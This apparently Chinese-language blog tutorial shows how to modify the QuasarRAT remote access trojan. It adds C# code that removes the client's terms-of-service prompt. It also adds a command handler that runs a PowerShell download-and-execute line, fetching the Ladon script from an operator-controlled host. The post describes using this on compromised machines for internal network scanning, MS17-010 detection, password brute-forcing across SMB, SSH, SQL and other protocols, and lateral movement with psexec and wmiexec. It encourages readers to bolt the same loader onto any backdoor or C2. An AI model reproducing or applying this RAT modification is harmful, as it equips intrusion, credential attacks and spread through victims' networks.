logo

K8哥哥

没有绝对安全的系统

〖教程〗QuasarRat代码修改加载Ladon一键扫描内网

简介

修改Quasar加载Ladon一键扫描内网,在CmdShell上使用Ladon命令对内网进行存活主机探测、操作系统识别、端口扫描、服务识别、MS17010高危漏洞检测、SSH\SMB\WMI\IPC\MYSQL\ORACLE\SQL\FTP\NBT网络协议密码爆破,以及内网横向移动wmiexec、psexec、smbexec、sshexec等

QuasarRat

Quasar是一种公开可用的开源远程访问木马(RAT),主要针对Windows操作系统。Quasar通过恶意附件在网络钓鱼电子邮件中分发。
Quasar最初是由GitHub用户 MaxXor 开发,用于合法用途。然而,该工具此后被黑客用于各种网络间谍活动。Quasar于2014年7月首次发布,名为“xRAT 2.0”,后来于2015年8月更名为“Quasar”。https://github.com/quasar/QuasarRAT

去启动框

主窗体,注释以下代码,启动客户端就不会再弹启动框了

private void ShowTermsOfService()
{
    //using (var frm = new FrmTermsOfUse())
    //{
    //    frm.ShowDialog();
    //}
    //Thread.Sleep(300);
}

联动Ladon

SystemHandler.cs第484行,加上以下代码,Url改成自己的PowerLadon,编译即可。当然这段代码放在客户端的下发指令这里也可以。

else if (input.Substring(0, 5) == "Ladon")
{
    string LadonUrl = "http://192.168.1.110:800/Ladon.ps1";
    string LadonCmd = "powershell -nop -c \"IEX (New-Object Net.WebClient).DownloadString('" + LadonUrl + "'); " + input + "\"";
    _shell.ExecuteCommand(LadonCmd);
}

PS:任何shell、C2、RAT、后门不管你怎么称呼,但凡能执行命令的地方,都可用此方法加载Ladon强化自己的工具

执行效果

机器上线后,在CmdShell上使用Ladon命令对内网进行存活主机探测、操作系统识别、端口扫描、服务识别、MS17010高危漏洞检测、SSH\SMB\WMI\IPC\MYSQL\ORACLE\SQL\FTP\NBT网络协议密码爆破,以及内网横向移动wmiexec、psexec、smbexec、sshexec等,更多功能请看Ladon文档。下图为探测C段存活主机,探测B段可使用ip/b参数,当然探测C段也可使用ip/c参数,不是非要/24.

Ladon下载

PowerLadon: https://github.com/k8gege/PowerLadon
历史版本: http://github.com/k8gege/Ladon/releases
7.0版本:http://k8gege.org/Download
7.8版本:K8小密圈

扫码加入K8小密圈